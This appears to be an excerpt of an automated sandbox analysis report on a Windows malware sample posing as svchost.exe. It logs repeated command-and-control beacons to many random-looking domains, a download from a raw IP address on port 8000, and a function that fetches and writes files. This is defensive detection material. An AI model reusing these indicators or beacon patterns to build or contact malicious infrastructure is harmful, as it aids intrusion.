Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345217\|1731345181\|18\|2\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478890781963739088
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345224\|1731345181\|21\|2\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478890781963739088
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345224\|1731345181\|21\|2\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=ff4a393e-1a61-4543-92b2-8dd8ca6534da
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478890781963739088
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=fa102a5d00349f2116233e3008bec66a\|66.23.206.109\|1731345224\|1731345181\|21\|2\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=a6a1e25fd407ed990568203a5694c412\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=0bd0e9c81f5fb4bdcf4537ef7dcca8b6\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478890781963739088
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=97471f70b05d0f64af71004a8ad4014f\|66.23.206.109\|1731345224\|1731345181\|12\|3\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.comCookie: snkz=66.23.206.109; btst=1e822420cb8d3f7ff6bc20592f4b28e8\|66.23.206.109\|1731345185\|1731345185\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comCookie: snkz=66.23.206.109; btst=e5cea2794c01fe0d297510f888cbb928\|66.23.206.109\|1731345186\|1731345186\|0\|1\|0
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global traffic	HTTP traffic detected: GET /dh/147287063_343064.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com

Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02C839C0 memset,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,memset,InternetReadFile,WriteFile,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,RtlFreeHeap,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_02C839C0

Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
